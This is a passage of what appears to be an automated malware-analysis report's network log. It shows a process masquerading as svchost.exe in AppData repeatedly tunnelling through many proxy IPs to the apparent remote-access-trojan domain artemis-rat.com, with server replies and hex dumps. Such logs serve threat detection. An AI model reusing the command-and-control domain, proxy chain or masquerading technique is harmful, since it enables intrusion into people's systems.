                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2765192.168.2.55912774.48.7.438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.700109959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2766192.168.2.558948212.127.93.185808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.705625057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2767192.168.2.558716117.160.250.130889943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.720973015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.146133900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.090934992 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2768192.168.2.559215103.133.222.17044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.722424030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2769192.168.2.55899643.131.246.771567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.723516941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2770192.168.2.559217103.133.222.17044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.724205017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2771192.168.2.559219103.133.222.17044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.726479053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2772192.168.2.559222103.133.222.17044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.727608919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2773192.168.2.5589318.209.255.13312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.730398893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.546283007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.777407885 CET38INHTTP/1.1 200 OK
                                                                                    content-length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2774192.168.2.55911068.71.254.6414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.730418921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2775192.168.2.558911102.223.20.2178043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.731107950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.116292000 CET493INHTTP/1.1 302 Found
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                    Location: https://repository.gij.edu.gh
                                                                                    Content-Length: 295
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 70 6f 73 69 74 6f 72 79 2e 67 69 6a 2e 65 64 75 2e 67 68 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://repository.gij.edu.gh">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2776192.168.2.558976171.244.140.1601508443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.733536959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.645947933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.833698034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.146372080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2777192.168.2.55910052.151.210.204900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.735299110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2778192.168.2.55896364.43.89.102636143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.735558033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.112376928 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2779192.168.2.55641337.120.192.154808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.744434118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2780192.168.2.559101162.223.91.118043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.745634079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2781192.168.2.5591263.21.101.158312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.749850035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.229177952 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2782192.168.2.55924349.51.93.22244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.752810955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2783192.168.2.55924649.51.93.22244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.754676104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2784192.168.2.55924749.51.93.22244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.755760908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2785192.168.2.55924949.51.93.22244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.757334948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2786192.168.2.559042121.128.194.1548043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.759418011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2787192.168.2.559176104.20.75.318043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.766230106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.921418905 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2788192.168.2.55904358.234.116.1978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.766606092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2789192.168.2.559178104.27.37.1318043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.770339012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.925520897 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2790192.168.2.55904647.243.114.192818043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.772002935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2791192.168.2.55905183.229.61.198312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.772243023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.442779064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.442920923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.333657026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2792192.168.2.559181185.162.228.1288043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.773232937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.928956985 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2793192.168.2.559186104.20.51.998043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.780108929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.935426950 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
